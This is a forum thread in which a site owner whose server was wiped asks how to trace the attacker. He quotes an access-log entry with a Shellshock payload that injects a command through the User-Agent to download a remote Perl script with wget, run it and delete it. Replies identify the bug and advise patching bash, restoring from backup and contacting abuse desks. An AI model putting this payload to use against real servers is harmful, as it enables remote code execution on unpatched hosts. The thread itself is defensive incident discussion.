Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
A
A
Alexnn2014-12-05 10:49:55
Information Security
Alexnn, 2014-12-05 10:49:55

How to find and punish a hacker?

One of my sites is gone. More precisely, the httpdocs and httpsdocs directories turned out to be empty
. Access logs showed that the site began to generate a 404 error after such a request:
89.248.172.175 - - [28/Nov/2014:19:29:57 +0100] "GET /phppath/cgi_wrapper HTTP /1.1" 200 174 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\" ;system(\"cd /tmp;wget -q 82.165.135.9/android.txt;perl android.txt;rm -rf android*\");'"
89.248.172.175 -provider found, email sent to abuse mailbox.
File 82.165.135.9/android.txt - saved
82.165.135.9 - provider notified
What else can I do?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

5 answer(s)
Report
V
Vadim Misbakh-Soloviev, 2014-12-05
@mva

I would also advise:
1) do not call hackers (and even more so scriptkidis) hackers indiscriminately
2) understand that the fault lies with you, and not with him
3) understand why he did it: to show you the vulnerability that you preferred Score

Report
V
Vlad Zhivotnev, 2014-12-05
@inkvizitor68sl

shellshock.
bash needs to be updated, my friend.
And on the ip-shnik, most likely, there lives a home user with a virus who has never heard such words.

Report
A
Armenian Radio, 2014-12-05
@gbg

  1. Take a snapshot of a disk
  2. Format all partitions
  3. Reinstall OS
  4. Restore site from backup
  5. fix the hole
  6. back to work

Report
S
Sergey Petrikov, 2014-12-05
@RicoX

1) Complete formatting of the server with reinstalling everything from scratch.
2) Dismiss / fine your crooked admin, who scored on the old vulnerability and server updates.
3) Get a lesson about the banal security of the server and hire a competent specialist to maintain it.
There is no way to find it, most likely all actions were performed through the site of the same lazy krivoruchka, which was hacked to yours, since the IP belongs to the Dutch hosting and not to the Internet provider. It also looks like the vulnerability was exploited by a primitive bot rather than a human, but more data is needed to confirm this for sure.

Report
P
Puma Thailand, 2014-12-05
@opium

To the police, if a person is not very encrypted, then find and punish, and if there are a few brains, then all IPs are anonymous and you will not find the ends

Similar questions
S
Shing2021-02-24 13:00:17
How to protect your bank accounts from scammers and viruses? 3Reply
S
SYsWorms2017-02-26 14:50:50
Deanonymization, what's wrong? 1Reply
I
Imbecil2015-02-23 20:05:21
How to protect yourself from home PRISM? 1Reply
C
CRAZY99992015-03-02 12:36:51
What scheme is the safest for users to work with PTK PSD? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question